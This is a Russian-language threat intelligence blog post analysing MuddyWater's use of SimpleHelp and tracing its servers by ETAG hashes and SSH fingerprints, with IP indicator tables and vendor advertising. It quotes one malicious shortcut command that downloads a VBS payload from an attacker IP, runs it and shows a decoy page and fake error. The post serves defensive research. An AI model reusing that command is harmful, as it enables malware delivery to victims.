Раз ETAG, два ETAG: препарируем инфраструктуру MuddyWater | Блог F.A.C.C.T.

Продолжающийся политический кризис привел к значительному росту активности прогосударственных хакеров, как мы и прогнозировали в отчете «Эволюция киберпреступности. Анализ, тренды и прогнозы 2022/2023». Большинство атакующих занимались кибершпионажем против соседних государств. Одной из таких группировок была и остаётся MuddyWater, о которой F.A.C.C.T. уже писала в прошлом.

По данным публичных исследований, MuddyWater предположительно является одним из подразделений Министерства Разведки и Безопасности Ирана (MOIS). По данным Исследовательской службы Конгресса, MOIS «проводит внутреннее наблюдение для выявления противников режима», а также следит за активистами иранской оппозиции.

Одни из последних атак MuddyWater были нацелены на страховые, производственные и телекоммуникационные компании в Израиле и Египте. В ходе атак на израильские организации группа эксплуатировала уязвимости Log4j 2.

Последние несколько лет группа активно использует легитимные инструменты удаленного контроля, такие как ScreenConnect, RemoteUtilities и Syncro. С их помощью MuddyWater может в любой момент подключиться к устройствам пользователей, выполнить произвольные команды, а также загрузить и выгрузить любые интересующие хакеров файлы. Работу таких инструментов отследить достаточно сложно, поскольку они легальны, не скомпрометированы и, следовательно, не детектируются классическими средствами безопасности.  Осенью 2022 года с помощью системы F.A.C.C.T. Threat Intelligence мы обнаружили, что MuddyWater использует еще один подобный инструмент – SimpleHelp. Параллельно нашему расследованию коллеги из ESET опубликовали свой квартальный отчет, в котором также упоминают использование этого инструмента данной группой атакующих.

В этом блоге мы расскажем о техниках работы группы с SimpleHelp, а также о ранее неизвестной инфраструктуре злоумышленников, которую удалось раскрыть в ходе исследования. Постоянное отслеживание техник, тактик и методов  злоумышленников позволяет F.A.C.C.T. проактивно реагировать на готовящиеся вредоносные кампании и осуществлять блокировку новых серверов еще на этапе подготовки атак.

Цель нашего блога — помочь специалистам по информационной безопасности и реагированию на инциденты детально  разобраться в сетевой инфраструктуре MuddyWater и научиться находить серверы этой группировки самостоятельно. Это поможет выстроить с нуля или усилить существующую систему защиты организаций и проактивно обнаруживать новые активности данной группы атакующих.

Кто такие MuddyWater

Предполагаемая страна происхождения: Иран

Начало активности:  2017

Топ-5 атакуемых индустрий: военная промышленность, телекоммуникации, производство, образование, нефть и газ.

Топ-10 атакуемых стран: Турция, Пакистан, ОАЭ, Ирак, Израиль, Саудовская Аравия, Иордан, США, Азербайджан, Афганистан.

Известные названия: TEMP.Zagros, Seedworm, Static Kitten, SectorD02, TA450, Boggy Serpens, MERCURY.

Ключевые выводы

  • Группа MuddyWater использует легитимный инструмент удаленного контроля и управления устройствами SimpleHelp для закрепления на устройстве жертвы.
  • SimpleHelp не скомпрометирован, а используется так, как было задумано разработчиками. Злоумышленники нашли способ загружать данный инструмент с официального сайта и использовать его в своих атаках.
  • По нашим данным, первый случай использования данного инструмента группой MuddyWater датируется 30 июня 2022. На момент написания этого блога в распоряжении группы по меньшей мере 8 серверов, где установлен SimpleHelp.
  • Блог описывает ранее неизвестную инфраструктуру группы MuddyWater, а также указывает на связь с некоторыми публично известными адресами группы.
  • Серверы группы можно отслеживать через использование одинаковых ETAG хэшей:
    • 2aa6-5c939a3a79153
    • 2aa6-5b27e6e58988b
    • 2aa6-5c939a773f7a2.

SimpleHelp

Осенью 2022 года в ходе ретроспективного  анализа инфраструктуры наблюдаемых хакерских групп наша система F.A.C.C.T. Threat Intelligence задетектировала IP-адрес 51.254.25[.]36, который связан с группой MuddyWater по меньшей мере с февраля 2022 года. После этого нами был обнаружен связанный с адресом IP-файл SHA1:53ce7a2850e27465f3aae3cc2fae1a3ec1b6a640 c названием new aviation communications.exe.

Скриншот графового анализа связанной с инфраструктурой MuddyWater

Изображение 1. Скриншот графового анализа связанной с 51.254.25[.]36 инфраструктуры в интерфейсе F.A.C.C.T. Threat Intelligence

Файл new aviation communications.exe был загружен на VirusTotal 30 июня 2022. Этот файл – не что иное, как легитимная версия инструмента SimpleHelp с действующей цифровой подписью, скомпилированная 2021-06-18 13:45:41 UTC.

Даты компиляции и загрузки на VirusTotal

Изображение 2. Даты компиляции и загрузки на VirusTotal файла SHA1:53ce7a2850e27465f3aae3cc2fae1a3ec1b6a640

 

Цифровые подписи файла muddywater

Изображение 3. Цифровые подписи файла SHA1:53ce7a2850e27465f3aae3cc2fae1a3ec1b6a640

На другой паре IP-адресов, которые система F.A.C.C.T. Threat Intelligence атрибутирует к группе MuddyWater, мы также обнаружили развернутые SimpleHelp серверы: 51[.]255[.]19[.]179, 51[.]255[.]19[.]178

Панель управления SimpleHelp

SimpleHelp от одноименного разработчика SimpleHelp Ltd (UK) представляет собой панель управления для системных администраторов и технической поддержки. Она выглядит следующим образом:

Интерфейс SimpleHelp

Изображение 5. Интерфейс SimpleHelp

Клиент SimpleHelp, который устанавливается на компьютере жертвы, способен работать как сервис, что позволяет получать доступ к устройству пользователя в любой момент времени даже после перезагрузки.

Удаленный доступ к компьютеру жертвы в SimpleHelp

Изображение 6. Удаленный доступ к компьютеру жертвы в SimpleHelp

Кроме удаленного подключения, операторы SimpleHelp способны выполнять различные команды на устройстве жертвы, в том числе и с правами администратора:

Также операторы могут использовать команду Connect in Terminal Mode для скрытого управления устройством.

Команда Connect in Terminal Mode

Изображение 8. Команда Connect in Terminal Mode

В таком случае командная оболочка открывается с правами system:

Иными словами, стандартный функционал SimpleHelp дает злоумышленниками почти безграничные возможности для проведения атак.

Что происходит после установки SimpleHelp?

На данный момент нам неизвестно, как именно данные образцы распространяются и какие дальнейшие шаги предпринимаются MuddyWater после получения доступа через SimpleHelp. Однако можно предположить, что группа рассылает фишинговые письма содержащие ссылки на файловые хранилища, такие как Onedrive или Onehub, для дальнейшей загрузки SimpleHelp-установщиков. Группа также может дополнительно закрепляться на устройстве жертвы, например, с использованием Fast Reverse Proxy (FRP) или Ligolo, выгружать интересующую информацию и искать пути передвижения в сети.

Сетевая инфраструктура MuddyWater

Group-IB уделяет много внимания отслеживанию сетевой инфраструктуры как прогосударственных, так и киберпреступных группировок. Этот метод позволяет нам проактивно защищать наших клиентов и собирать данные о новых и готовящихся атаках даже без наличия вредоносных сэмплов. Актуальную инфраструктуру MuddyWater можно разделить на две части:

  • Публично известные адреса группы;
  • Публично не оглашаемые IP-адреса, которые мы в F.A.C.C.T. с высоким уровнем уверенности оцениваем как используемые данной группой.

Было установлено, что MuddyWater использует свой уникальный набор компонентов для развертывания веб-серверов на купленных ими VPS-серверах. Нами были выявлены следующие ETAG хэши, которые используются группой:

  • 2aa6-5c939a3a79153;
  • 2aa6-5b27e6e58988b;
  • 2aa6-5c939a773f7a2.

Часть серверов, связанных с этими ETAG хэшами, уже известна как используемая группой MuddyWater. Другая часть имеет связи с различными вредоносными файлами или ПО, использующимся для атак, в том числе и легальными установщиками SimpleHelp.

Let’s do the Graph

Начнем с публично известных адресов группы для того, чтобы наглядно показать связь. Согласно отчету Microsoft,  группа MuddyWater использовала следующие адреса, на которых были найдены вышеуказанные ETAG хэши:

  • 164[.]132[.]237[.]64
  • 91[.]121[.]240[.]104
Скриншот графового анализа инфраструктуры MuddyWater

Изображение 9. Скриншот графового анализа инфраструктуры MuddyWater в интерфейсе F.A.C.C.T. Threat Intelligence

164[.]132[.]237[.]64

Данный хост обладает сразу несколькими ETAG хэшами.

Скриншот графового анализа хоста MuddyWater

Изображение 10. Скриншот графового анализа хоста 164[.]132[.]237[.]64 и связанных ETAG хэшей в интерфейсе F.A.C.C.T. Threat Intelligence

Исследование инфраструктуры показало пересечение хостов 164[.]132[.]237[.]64 и 164[.]132[.]237[.]65 через использование одного SSH-отпечатка SSH-fingerprint e7383c77c6f804cffac6c88651b7bce2.

Скриншот графового анализа части инфраструктуры MuddyWater

Изображение 11. Скриншот графового анализа части инфраструктуры MuddyWater в интерфейсе F.A.C.C.T. Threat Intelligence

На сервере 164[.]132[.]237[.]65 мы обнаружили фреймворк Cobalt Strike со следующим файлом конфигурации:

Файл конфигурации Cobalt Strike

Изображение 12. Файл конфигурации Cobalt Strike

В ноябре 2022 года, команда Лаборатории Компьютерной Криминалистики F.A.C.C.T. совместно с командой Threat Intelligence проводили реагирование на инцидент в сети организации на Ближнем Востоке. В результате было выявлено, что вышеуказанный адрес 164[.]132[.]237[.]65 использовался в данной атаке, а тактики, техники и процедуры (TTP), которые были обнаружены нами, полностью совпадают с TTP группы MuddyWater. Примечательным в этом конфиге является отсутствие поля watermark, а также уникальное значение в поле http-post.client. Это говорит, о том, что злоумышленники используют кастомные образцы известного инструмента Cobalt Strike, которые можно отслеживать.

91[.]121[.]240[.]104

Данный IP адрес также был упомянут в отчете Microsoft и имеет ETAG:2aa6-5c939a3a79153:

Скриншот графового анализа IP адреса MuddyWater

Изображение 13. Скриншот графового анализа IP адреса 91[.]121[.]240[.]104 в интерфейсе F.A.C.C.T. Threat Intelligence

Подозрительные ETAG хэши: ранее неизвестная инфраструктура MuddyWater

Данная часть блога описывает ранее неизвестную инфраструктуру группы MuddyWater, а также некоторые публично известные адреса атакующих.

ETAG:2aa6-5c939a3a79153:

Если посмотреть на изображение ниже, можно заметить, что три вышеупомянутых IP-адреса связаны через HTTP ETAG:2aa6-5c939a3a79153. По данному ETAG в базе системы F.A.C.C.T. Threat Intelligence находится более 50 серверов. С их полным списком можно ознакомиться в Таблице индикаторов в конце блога. В данном разделе указаны самые интересные на наш взгляд IP-адреса, связанные с ETAG:2aa6-5c939a3a79153.

Скриншот графового анализа части ранее неизвестной инфраструктуры злоумышленников

Изображение 14. Скриншот графового анализа части ранее неизвестной инфраструктуры злоумышленников в интерфейсе F.A.C.C.T. Threat Intelligence

137[.]74[.]131[.]24

Данный адрес исследователи F.A.C.C.T. также нашли в сети ближневосточной организации во время проведения реагирования на инцидент. В результате исследования сети жертвы были выявлены следы группы MuddyWater.

Скриншот графового анализа хоста и связанных ETAG

Изображение 15. Скриншот графового анализа хоста 137[.]74[.]131[.]24 и связанных ETAG в интерфейсе F.A.C.C.T. Threat Intelligence

91[.]121[.]240[.]96

ETAG 2aa6-5c939a3a79153 был найден на IP-адресе 91[.]121[.]240[.]96 в период с 2021.10.25 по 2022.09.23.

С этим адресом связан скрипт PowerShell, который грузился на VirusTotal через веб-интерфейс из Казахстана 19 июля 2022, то есть в период наличия ETAG на сервере.

Скрипт PowerShell, загруженный на VirusTotal

Изображение 16. Скрипт PowerShell, загруженный на VirusTotal 19 июля 2022

Этот код представляет собой скрипт на языке PowerShell. Его задача заключается в том, чтобы периодически получать команды от удаленного сервера, выполнять их на устройстве-жертвы и отправлять результаты обратно на сервер.

Сетевое взаимодействие PowerShell скрипта с C&C-сервером

Изображение 17. Сетевое взаимодействие PowerShell скрипта с C&C-сервером 91[.]121[.]240[.]96

91[.]121[.]240[.]108

Это еще один IP-адрес, связанный с ETAG:2aa6-5c939a3a79153. На VirusTotal был обнаружен файл-ярлык, загруженный 11 октября 2022.

Метаданные файла muddywater

Изображение 18. Метаданные файла SHA256: 2528838a609aa143769efb37dff45af723868d4ed33eb1ce0e2d6ce64b2a1507

Этот файл распространялся через архив с названием  request-for-service-no10102022.zip

Сам архив был загружен на VirusTotal из Литвы и Швейцарии:

Даты загрузки архива request-for-service-no10102022.zip на VirusTotal

Изображение 19. Даты загрузки архива request-for-service-no10102022.zip на VirusTotal

Shell-команда в ярлыке:

/c curl -s http://91[.]121[.]240[.]108:443/HBIy > C:\programdata\temp.vbs && START microsoft-edge:hxxps://mohap[.]gov[.]ae/ && msg * The file is c orrupted . && C:\programdata\temp.vbs

Команда отвечает  за загрузку полезной нагрузки из http://91[.]121[.]240[.]108:443/HBIy и ее сохранение в файл C:\programdata\temp.vbs во время исполнения ярлыка. Для отвлечения внимания открывается microsoft-edge на странице hxxps://mohap[.]gov[.]ae с диалоговым окном, сообщающим, что файл повреждён. К сожалению, на момент анализа, файл HBIy был недоступен, поэтому нам не удалось исследовать его содержимое.

Из интересных деталей:  можно заметить имя пользователя, которое оставалось в процессе создания ярлыка: C:\Users\Pink Panter\Documents\PDF.ico, что указывает на ник пользователя создавшего данный файл – Pink Panter.

178[.]32[.]30[.]3

Данный IP уже использовался группой MuddyWater в ходе атак на Турцию и ряд азиатских стран, описанных исследователями Cisco Talos, и также имеет ETAG:2aa6-5c939a3a79153.

Скриншот графового анализа связей IP адреса muddywater

Изображение 20. Скриншот графового анализа связей IP адреса 178[.]32[.]30[.]3 в интерфейсе F.A.C.C.T. Threat Intelligence

149[.]202[.]242[.]80

149[.]202[.]242[.]80 также был связан с другим ETAG:2aa6-5b27e6e58988b, о нём ниже.

Скриншот графового анализа связей IP адреса MuddyWater

Изображение 21. Скриншот графового анализа связей IP адреса 149[.]202[.]242[.]80 в интерфейсе F.A.C.C.T. Threat Intelligence

ETAG:2aa6-5b27e6e58988b

IP-адрес 149[.]202[.]242[.]80 владеет сразу несколькими ETAG. Один из них ETAG:2aa6-5b27e6e58988b.

С данным ETAG связано пять серверов в интернете. Один из них 164[.]132[.]237[.]66, который входит в состав уже упомянутой выше подсети 164[.]132[.]237[.]0/24.

Скриншот графового анализа ETAG и связанных адресов muddywater

Изображение 22. Скриншот графового анализа ETAG:2aa6-5b27e6e58988b и связанных адресов в интерфейсе F.A.C.C.T. Threat Intelligence

Также этот адрес связан еще и с ETAG: 2aa6-5c939a773f7a2, о котором мы расскажем ниже.

SSH Fingerprint — 3648a6085512ab91f5a23bafb8418f7b

Данный SSH-отпечаток связан с шестью IP-адресами:

  • 51[.]255[.]19[.]183
  • 149[.]202[.]242[.]85
  • 149[.]202[.]242[.]80
  • 164[.]132[.]237[.]64
  • 164[.]132[.]237[.]66
  •  149[.]202[.]242[.]86

Этот SSH-отпечаток связан с уже знакомым адресом группы 164[.]132[.]237[.]64.

Скриншот графового анализа связей SSH-отпечатка

Изображение 23. Скриншот графового анализа связей SSH-отпечатка в интерфейсе F.A.C.C.T. Threat Intelligence

Хосты 164[.]132[.]237[.]66 и 149[.]202[.]242[.]85,  связанные с этим SSH-отпечатком, делят между собой уже упомянутый ETAG: 2aa6-5c939a773f7a2. Часть адресов этого ETAG также пересекается с 2aa6-5c939a3a79153.

ETAG: 2aa6-5c939a773f7a2

137[.]74[.]131[.]16 и 149[.]202[.]242[.]84

Данные адреса использовались группой MuddyWater в прошлом, об этом писали коллеги из Cisco Talos.

Скриншот графового анализа связей ETAG MuddyWater

Изображение 24. Скриншот графового анализа связей ETAG: 2aa6-5c939a773f7a2 в интерфейсе F.A.C.C.T. Threat Intelligence

В данном исследовании мы упомянули только те IP-адреса, которые имеют связанные файлы или интересную историю. Ознакомиться с остальными IP-адресами, связанными с тем или иным ETAG, можно в таблице ниже.

Выводы

Как и прежде, мы считаем важным делиться актуальными способами хантинга атакующих и призываем исследователей чаще публиковать последние находки в мире кибербезопасности. Специалисты  могут использовать указанные в данной статье ETAG хэши и осуществлять поиск вредоносных серверов с использованием таких поисковых систем как Censys или Shodan. Также в таблице с сетевыми индикаторами указаны адреса некоторых серверов, где установлен SimlpeHelp и которые, по данным F.A.C.C.T. Threat Intelligence, принадлежат группе MuddyWater.

На данный момент нам точно неизвестен вектор распространения установщиков SimpleHelp, однако можно предположить, что злоумышленники используют фишинговые письма со ссылками, ведущими на облачные хранилища, такие как OneDrive, Onehub или Dropbox.

Рекомендации

  1. Используйте сетевые индикаторы, приведенные нами в этом блоге, для того, чтобы отслеживать активность хакерской группы MuddyWater и проактивно защищаться от ее атак. Так, применяя такие поисковые системы, как Shodan, можно осуществлять поиск вредоносных серверов злоумышленников и всегда быть наготове к проактивной блокировке таких хостов. Кроме того, Shodan вполне может также использоваться для поиска новой инфраструктуры группы.
  2. Используйте инструменты для защиты корпоративной электронной почты, чтобы эффективно предотвращать использование этого вектора атаки различными группами злоумышленников. Решение Group-IB Business Email Protection, благодаря уникальным данным киберразведки и запатентованным технологиям, с беспрецедентной точностью обнаруживает и блокирует фишинг, вредоносные вложения и другие BEC-атаки, даже если киберпреступники применяют техники обхода обнаружения таких угроз. Также F.A.C.C.T. Business Email Protection позволяет анализировать и атрибутировать угрозы, распространяемые через электронную почту, чтобы проактивно защищаться от похожих атак и повысить общий уровень защищенности организации.
  3. Продвинутым командам по кибербезопасности мы рекомендуем использовать систему Group-IB Threat Intelligence, с помощью которой, как мы показали в этом блоге, мы обнаружили факт использования группой MuddyWater инструмента SimpleHelp и вычислили ранее неизвестную инфраструктуру злоумышленников. Благодаря уникальным источникам данных, наша система Threat Intelligence может использоваться для выявления фишинга и других актуальных киберугроз еще на стадии их подготовки. С  помощью встроенного инструмента графового анализа, усиленного данными из самой обширной базы злоумышленников, можно легко и быстро атрибутировать угрозы, выявлять связи между атакующими, их инфраструктурой и инструментами. Обогащение экосистемы кибербезопасности компании данными киберразведки позволяет значительно повысить возможность противостоять атакам, в том числе и со стороны прогосударственных атакующих.

Усильте защиту от киберугроз с F.A.C.C.T. Threat Intelligence

Используйте уникальные данные киберразведки для проактивного предотвращения атак

Network Indicators

Hosts by ETAG:

2aa6-5c939a3a79153

Hosts by ETAG:

2aa6-5b27e6e58988b

Publicly Confirmed MuddyWater

IPs

Hosts by ETAG:

2aa6-5c939a773f7a2

MuddyWater SimpleHelp servers
137.74.131.19 149.202.242.80 141.95.177.133 141.95.177.129
137.74.131.20 149.202.242.86 141.95.177.132 141.95.177.142
137.74.131.22 164.132.237.64 164.132.237.64 164.132.237.64 164.132.237.78
137.74.131.24 164.132.237.66 141.95.177.134 178.32.30.3
137.74.131.30 51.255.19.183 91.121.240.105 51.254.25.36
141.95.177.129 91.121.240.101 51.255.19.178
141.95.177.130 141.95.177.131 51.255.19.179
141.95.177.131 91.121.240.100 91.121.240.110
141.95.177.135 137.74.131.16 137.74.131.16
141.95.177.142 137.74.131.18
141.95.177.143 149.202.242.87
149.202.242.80 149.202.242.85
151.80.172.146 149.202.242.84 149.202.242.84
151.80.172.147 37.187.204.26
151.80.172.149
164.132.237.64
164.132.237.65
164.132.237.70
164.132.237.71
164.132.237.74
164.132.237.75
164.132.237.76
164.132.237.78
178.32.30.0
178.32.30.1
178.32.30.2
178.32.30.3 178.32.30.3
37.187.204.25
5.196.249.161
5.196.249.162
51.254.25.36
51.255.19.178
51.255.19.179
51.83.56.226
91.121.240.100
91.121.240.101
91.121.240.102
91.121.240.103
91.121.240.104 91.121.240.104
91.121.240.106
91.121.240.107
91.121.240.108
91.121.240.109
91.121.240.110
91.121.240.111
91.121.240.96
91.121.240.98
91.121.240.99
91.134.169.137
91.134.169.139